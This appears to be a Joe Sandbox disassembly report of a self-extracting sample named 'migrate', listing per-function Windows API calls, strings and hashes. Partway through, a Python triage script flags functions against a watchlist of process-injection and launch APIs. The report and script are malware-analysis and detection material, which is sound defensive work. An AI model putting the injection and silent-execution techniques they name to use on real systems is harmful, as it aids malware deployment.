control_flow_graph 836 12d78f-12d7a7 call 12ec50 839 12d9e8-12d9f0 836->839 840 12d7ad-12d7b9 call 133e13 836->840 840->839 843 12d7bf-12d7e7 call 12fff0 840->843 846 12d7f1-12d7ff 843->846 847 12d7e9 843->847 848 12d812-12d818 846->848 849 12d801-12d804 846->849 847->846 851 12d85b-12d85e 848->851 850 12d808-12d80e 849->850 853 12d810 850->853 854 12d837-12d844 850->854 851->850 852 12d860-12d866 851->852 857 12d868-12d86b 852->857 858 12d86d-12d86f 852->858 859 12d822-12d82c 853->859 855 12d9c0-12d9c2 854->855 856 12d84a-12d84e 854->856 862 12d9c6 855->862 856->862 863 12d854-12d859 856->863 857->858 864 12d882-12d898 call 11b92d 857->864 858->864 865 12d871-12d878 858->865 860 12d81a-12d820 859->860 861 12d82e 859->861 860->859 868 12d830-12d833 860->868 861->854 869 12d9cf 862->869 863->851 872 12d8b1-12d8bc call 11a231 864->872 873 12d89a-12d8a7 call 121fbb 864->873 865->864 866 12d87a 865->866 866->864 868->854 871 12d9d6-12d9d8 869->871 875 12d9e7 871->875 876 12d9da-12d9dc 871->876 882 12d8d9-12d8e6 ShellExecuteExW 872->882 883 12d8be-12d8d5 call 11b6c4 872->883 873->872 881 12d8a9 873->881 875->839 876->875 880 12d9de-12d9e1 ShowWindow 876->880 880->875 881->872 882->875 885 12d8ec-12d8f9 882->885 883->882 887 12d8fb-12d902 885->887 888 12d90c-12d90e 885->888 887->888 889 12d904-12d90a 887->889 890 12d910-12d919 888->890 891 12d925-12d944 call 12dc3b 888->891 889->888 892 12d97b-12d987 CloseHandle 889->892 890->891 898 12d91b-12d923 ShowWindow 890->898 891->892 905 12d946-12d94e 891->905 894 12d998-12d9a6 892->894 895 12d989-12d996 call 121fbb 892->895 894->871 897 12d9a8-12d9aa 894->897 895->869 895->894 897->871 901 12d9ac-12d9b2 897->901 898->891 901->871 904 12d9b4-12d9be 901->904 904->871 905->892 906 12d950-12d961 GetExitCodeProcess 905->906 906->892 907 12d963-12d96d 906->907 908 12d974 907->908 909 12d96f 907->909 908->892 909->908
APIs
• _wcslen.LIBCMT ref: 0012D7AE
• ShellExecuteExW.SHELL32(?), ref: 0012D8DE
• ShowWindow.USER32(?,00000000), ref: 0012D91D
• GetExitCodeProcess.KERNEL32(?,?), ref: 0012D959
• CloseHandle.KERNEL32(?), ref: 0012D97F
• ShowWindow.USER32(?,00000001), ref: 0012D9E1
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
• String ID: .exe$.inf
• API String ID: 36480843-3750412487
• Opcode ID: 132138c0d9b03ffa65fd87e319bcd47506d96a8af3544a58b76ce41ac6933b0d
• Instruction ID: 2586bfc3c32b3044c887554b817c1c5a3a519c58de7e8015eb1a1ca0a722af53
• Opcode Fuzzy Hash: 132138c0d9b03ffa65fd87e319bcd47506d96a8af3544a58b76ce41ac6933b0d
• Instruction Fuzzy Hash: 5551D4704083A09AEB319F24F844BABBBE4AF55748F04041EF9C5971A1E7B18EE5DB52
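Each block above lists, for one recovered function, the Win32/CRT calls with their call-site addresses, the strings the function references and a fuzzy hash for similarity lookups. Reading dozens of these by hand is slow, so the Python below, an added example that is not part of the Joe Sandbox report or its tooling, parses that text layout into records and flags functions whose own API set hits a small watchlist. The watchlist and the abbreviated SAMPLE text are constructed for the example; SAMPLE mirrors the ShellExecuteExW and GDI+ blocks shown on this page, and the layout assumptions (bullet, `ref:` suffix, `Part of subcall function` prefix, `$`-joined String ID) are taken from how the report renders here.

```python
"""Parse the per-function 'APIs' / 'Similarity' blocks of a Joe Sandbox
disassembly listing and flag functions that call watch-listed APIs.

Added example, not Joe Sandbox code. Layout assumptions follow the
report as rendered on this page; WATCHLIST and SAMPLE are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One API bullet, in any of the three shapes the report uses:
#   • ShellExecuteExW.SHELL32(?), ref: 0012D8DE
#   • _wcslen.LIBCMT ref: 0012D7AE                       (no argument list)
#   • Part of subcall function 0012A626: GdipAlloc.GDIPLUS(00000010), ref: 0012A62C
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*?)\s*$")
HASH_RE = re.compile(r"^\s*•\s*Instruction Fuzzy Hash:\s*(?P<h>[0-9A-Fa-f]+)\s*$")

# Constructed watchlist: APIs worth a second look in an unsigned dropper.
WATCHLIST = {"ShellExecuteExW", "CreateProcessW", "CreateProcessA",
             "WriteProcessMemory", "VirtualAllocEx", "CreateRemoteThread",
             "LoadLibraryExW", "RegSetValueExW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str                 # call-site address printed after 'ref:'
    subcall: Optional[str]   # callee address when listed as 'Part of subcall'


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fuzzy_hash: str = ""

    def direct_apis(self) -> List[str]:
        """APIs the function itself calls; subcall attributions excluded."""
        return sorted({c.name for c in self.calls if c.subcall is None})


def parse_blocks(text: str) -> List[FunctionBlock]:
    """'APIs' opens a function block; the 'Instruction Fuzzy Hash' line,
    the last field of its 'Similarity' section, closes it."""
    blocks: List[FunctionBlock] = []
    current: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"],
                                         m["args"] or "", m["ref"], m["sub"]))
            continue
        m = STRING_RE.match(line)
        if m:
            # The report joins several referenced strings with '$'.
            current.strings = [s for s in m["ids"].split("$") if s]
            continue
        m = HASH_RE.match(line)
        if m:
            current.fuzzy_hash = m["h"]
            current = None
    return blocks


def triage(blocks: List[FunctionBlock]) -> List[Tuple[str, List[str], List[str]]]:
    """One (first call-site ref, flagged direct APIs, strings) tuple per hit."""
    hits = []
    for b in blocks:
        flagged = [n for n in b.direct_apis() if n in WATCHLIST]
        if flagged and b.calls:
            hits.append((b.calls[0].ref, flagged, b.strings))
    return hits


# Constructed sample mirroring two blocks of the listing on this page.
SAMPLE = """\
APIs
• _wcslen.LIBCMT ref: 0012D7AE
• ShellExecuteExW.SHELL32(?), ref: 0012D8DE
• ShowWindow.USER32(?,00000000), ref: 0012D91D
• GetExitCodeProcess.KERNEL32(?,?), ref: 0012D959
• CloseHandle.KERNEL32(?), ref: 0012D97F
Similarity
• String ID: .exe$.inf
• Instruction Fuzzy Hash: 5551D4704083A09AEB319F24F844BABBBE4AF55748F04041EF9C5971A1E7B18EE5DB52
APIs
• GlobalUnlock.KERNEL32(00000000), ref: 0012A7C6
  • Part of subcall function 0012A626: GdipAlloc.GDIPLUS(00000010), ref: 0012A62C
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0012A7A7
Similarity
• String ID: PNG
• Instruction Fuzzy Hash: BF31C27A600712BFD7119F21EC88D1B7BB9FF85B61B000918F91592A70EB32DC90CBA1
"""

if __name__ == "__main__":
    for ref, apis, strs in triage(parse_blocks(SAMPLE)):
        print(f"function near {ref}: {', '.join(apis)}; strings {strs}")
```

The `Part of subcall function` bullets are kept on the record but left out of `direct_apis()`: the report attributes them to a callee, so counting them as the enclosing function's own behaviour would misattribute, for instance, a `LoadLibraryW` that lives in a shared helper. To run it over a saved report, pass `open(path, encoding="utf-8").read()` to `parse_blocks`; the fuzzy hash on each record is what you would feed into a similarity search across other samples.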

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 910 13a95b-13a974 911 13a976-13a986 call 13ef4c 910->911 912 13a98a-13a98f 910->912 911->912 919 13a988 911->919 914 13a991-13a999 912->914 915 13a99c-13a9c0 MultiByteToWideChar 912->915 914->915 917 13ab53-13ab66 call 12fbbc 915->917 918 13a9c6-13a9d2 915->918 920 13aa26 918->920 921 13a9d4-13a9e5 918->921 919->912 923 13aa28-13aa2a 920->923 924 13a9e7-13a9f6 call 142010 921->924 925 13aa04-13aa15 call 138e06 921->925 927 13aa30-13aa43 MultiByteToWideChar 923->927 928 13ab48 923->928 924->928 938 13a9fc-13aa02 924->938 925->928 935 13aa1b 925->935 927->928 931 13aa49-13aa5b call 13af6c 927->931 932 13ab4a-13ab51 call 13abc3 928->932 940 13aa60-13aa64 931->940 932->917 939 13aa21-13aa24 935->939 938->939 939->923 940->928 942 13aa6a-13aa71 940->942 943 13aa73-13aa78 942->943 944 13aaab-13aab7 942->944 943->932 947 13aa7e-13aa80 943->947 945 13ab03 944->945 946 13aab9-13aaca 944->946 950 13ab05-13ab07 945->950 948 13aae5-13aaf6 call 138e06 946->948 949 13aacc-13aadb call 142010 946->949 947->928 951 13aa86-13aaa0 call 13af6c 947->951 954 13ab41-13ab47 call 13abc3 948->954 964 13aaf8 948->964 949->954 962 13aadd-13aae3 949->962 950->954 955 13ab09-13ab22 call 13af6c 950->955 951->932 966 13aaa6 951->966 954->928 955->954 968 13ab24-13ab2b 955->968 967 13aafe-13ab01 962->967 964->967 966->928 967->950 969 13ab67-13ab6d 968->969 970 13ab2d-13ab2e 968->970 971 13ab2f-13ab3f WideCharToMultiByte 969->971 970->971 971->954 972 13ab6f-13ab76 call 13abc3 971->972 972->932
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001357FB,001357FB,?,?,?,0013ABAC,00000001,00000001,2DE85006), ref: 0013A9B5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0013ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0013AA3B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0013AB35
• __freea.LIBCMT ref: 0013AB42
  • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
• __freea.LIBCMT ref: 0013AB4B
• __freea.LIBCMT ref: 0013AB70
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: e5ffd78a591f42afe81575ebc125fd1df17b4e2ee6169e0717893f3851c9935c
• Instruction ID: 24246081b26e65910fd57e2f2dfa857508716c04aefb00b32f9328764229d81f
• Opcode Fuzzy Hash: e5ffd78a591f42afe81575ebc125fd1df17b4e2ee6169e0717893f3851c9935c
• Instruction Fuzzy Hash: 0751E372610216AFDB258F64CC82EBFB7AAEF54710F954628FC44E7154EB34DC80C6A2

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 975 133b72-133b7c 976 133bee-133bf1 975->976 977 133bf3 976->977 978 133b7e-133b8c 976->978 981 133bf5-133bf9 977->981 979 133b95-133bb1 LoadLibraryExW 978->979 980 133b8e-133b91 978->980 984 133bb3-133bbc GetLastError 979->984 985 133bfa-133c00 979->985 982 133b93 980->982 983 133c09-133c0b 980->983 986 133beb 982->986 987 133be6-133be9 984->987 988 133bbe-133bd3 call 136088 984->988 985->983 989 133c02-133c03 FreeLibrary 985->989 986->976 987->986 988->987 992 133bd5-133be4 LoadLibraryExW 988->992 989->983 992->985 992->987
APIs
• FreeLibrary.KERNEL32(00000000,?,?,00133C35,00000000,00000FA0,00172088,00000000,?,00133D60,00000004,InitializeCriticalSectionEx,00146394,InitializeCriticalSectionEx,00000000), ref: 00133C03
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: 931c68ec0e65ce27c79cd5ec9ba797dc8dad4fe3494e67dedb82d4a55e99d3ad
• Instruction ID: 756e2a2f5e57f3aba86c8b69a5e981c1e60abd22a4f59e0f895cf81a1e4083fd
• Opcode Fuzzy Hash: 931c68ec0e65ce27c79cd5ec9ba797dc8dad4fe3494e67dedb82d4a55e99d3ad
• Instruction Fuzzy Hash: 5F112935A05220ABCB228B689C41B5DF764AF02770F250211F935FB2A4E771EF4086E9

Control-flow Graph

APIs
  • Part of subcall function 0012081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
  • Part of subcall function 0012081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
• OleInitialize.OLE32(00000000), ref: 0012AC2F
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0012AC66
• SHGetMalloc.SHELL32(00158438), ref: 0012AC70
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
• String ID: riched20.dll$3Ro
• API String ID: 3498096277-3613677438

Control-flow Graph
APIs
  • Part of subcall function 0012081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00120836
  • Part of subcall function 0012081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0011F2D8,Crypt32.dll,00000000,0011F35C,?,?,0011F33E,?,?,?), ref: 00120858
• GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0011F2E4
• GetProcAddress.KERNEL32(001581C8,CryptUnprotectMemory), ref: 0011F2F4
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AddressProc$DirectoryLibraryLoadSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 2141747552-1753850145

Control-flow Graph
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00117760,?,00000005,?,00000011), ref: 0011995F
• GetLastError.KERNEL32(?,?,00117760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0011996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00117760,?,00000005,?), ref: 001199A2
• GetLastError.KERNEL32(?,?,00117760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001199AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00117760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001199F9
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0

Control-flow Graph
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
• IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
• TranslateMessage.USER32(?), ref: 0012B5AC
• DispatchMessageW.USER32(?), ref: 0012B5B6
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0

Control-flow Graph
APIs
• GetClassNameW.USER32(?,?,00000050), ref: 0012ABC2
• SHAutoComplete.SHLWAPI(?,00000010), ref: 0012ABF9
  • Part of subcall function 00121FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0011C116,00000000,.exe,?,?,00000800,?,?,?,00128E3C), ref: 00121FD1
• FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0012ABE9
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                    • String ID: EDIT
                                                                                                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                                                                                                    • Opcode ID: 0bdc48540389669f2cd18ebfaa875a921da5b0eb3beef44421a90270c3c025b6
                                                                                                                                                                                                    • Instruction ID: ccfea15b420f6d05086f77ced0baa1f783dd50d305a4447c5e77dd0e7cd4dca3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bdc48540389669f2cd18ebfaa875a921da5b0eb3beef44421a90270c3c025b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F0823260023877DB20A624AC09F9B767C9F46B40F484021BA05F2180D765DE95C5B6

Control-flow Graph

[Graph not rendered: control-flow graph of the function starting at 12dbde (basic blocks 12dbde-12dc38; calls 12ec50, SetEnvironmentVariableW and 120371); legend: Executed / Not Executed]
APIs
• SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0012DBF4
• SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0012DC30
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID: sfxcmd$sfxpar
• API String ID: 1431749950-3493335439
• Opcode ID: e4afa2cc75f66de6f52519024a3004096c8dc2a07b373c946c1081514c722f0f
• Instruction ID: 758e29943da07bc894bf240669696a7e2cac8b6fdd1f8cb53a7bf1b926a2c632
• Opcode Fuzzy Hash: e4afa2cc75f66de6f52519024a3004096c8dc2a07b373c946c1081514c722f0f
• Instruction Fuzzy Hash: 57F0EC724042346BCB212FD4FC06BFA3B58AF15F81B040415BD8995162D7B089A0D6B0
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00119795
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001197AD
• GetLastError.KERNEL32 ref: 001197DF
• GetLastError.KERNEL32 ref: 001197FE
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: a4c6a121cb28230b1459e27a217a8fee6084b92d0a4d689b89ac891c6d7c3a8f
• Instruction ID: 39d8bb4da885715b5924babc10e2c3c9f7563c7f3729cf72a80530972c6b3175
• Opcode Fuzzy Hash: a4c6a121cb28230b1459e27a217a8fee6084b92d0a4d689b89ac891c6d7c3a8f
• Instruction Fuzzy Hash: 5B11CE34910208EBCF285F24C814AE937A9FF12720F108A39F436865D0D7709EC4DF61
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001340EF,00000000,00000000,?,0013ACDB,001340EF,00000000,00000000,00000000,?,0013AED8,00000006,FlsSetValue), ref: 0013AD66
• GetLastError.KERNEL32(?,0013ACDB,001340EF,00000000,00000000,00000000,?,0013AED8,00000006,FlsSetValue,00147970,FlsSetValue,00000000,00000364,?,001398B7), ref: 0013AD72
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0013ACDB,001340EF,00000000,00000000,00000000,?,0013AED8,00000006,FlsSetValue,00147970,FlsSetValue,00000000), ref: 0013AD80
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: e05b3181c12ccc26099f53c6fdc03976570603178372a4ab7f74de28a4f8521a
• Instruction ID: ca97607bfd33ea1fe409ffbbfe94b2e18562fe2089f26fd79c26adc508e71c69
• Opcode Fuzzy Hash: e05b3181c12ccc26099f53c6fdc03976570603178372a4ab7f74de28a4f8521a
• Instruction Fuzzy Hash: 82012B3A201232ABC7214FA8DC48E577FACEF067A3F510724F99AD3960D720D841C6E1
APIs
  • Part of subcall function 0011F2C5: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0011F2E4
  • Part of subcall function 0011F2C5: GetProcAddress.KERNEL32(001581C8,CryptUnprotectMemory), ref: 0011F2F4
• GetCurrentProcessId.KERNEL32(?,?,?,0011F33E), ref: 0011F3D2
Strings
• CryptProtectMemory failed, xrefs: 0011F389
• CryptUnprotectMemory failed, xrefs: 0011F3CA
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: AddressProc$CurrentProcess
• String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
• API String ID: 2190909847-396321323
• Opcode ID: 759bc676223e559760248ee47fc456b8a2ac66b3b51df9e7eb9044dc730d5543
• Instruction ID: a9eb4535bf03806cf039299ff5b15ee0896a341afc97efd01100c90abd54418a
• Opcode Fuzzy Hash: 759bc676223e559760248ee47fc456b8a2ac66b3b51df9e7eb9044dc730d5543
• Instruction Fuzzy Hash: 2D11B131601629ABDF19AF20D845AAE3754FF40760B14413AFC61AF2A1DB709EC2C792
APIs
• CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00121043
• SetThreadPriority.KERNEL32(?,00000000), ref: 0012108A
  • Part of subcall function 00116C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00116C54
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                                                                                                    • Opcode ID: 32ba7e08a103d8da361bd479a9ddde4b5f2dd8f2c8bf668c958e1ab7da783ab6
                                                                                                                                                                                                    • Instruction ID: c6a53ce7afa2502b7131d51da303a9d56ab78eced54ee1cb89a27893d81b0a98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32ba7e08a103d8da361bd479a9ddde4b5f2dd8f2c8bf668c958e1ab7da783ab6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E0126B5304319BFD3389F64BC51BB673A9EB60752F20002EFA82571C0CBA168C48224

APIs
• GetStdHandle.KERNEL32(000000F5,?,?,?,?,0011D343,00000001,?,?,?,00000000,0012551D,?,?,?), ref: 00119F9E
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0012551D,?,?,?,?,?,00124FC7,?), ref: 00119FE5
• WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0011D343,00000001,?,?), ref: 0011A011
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
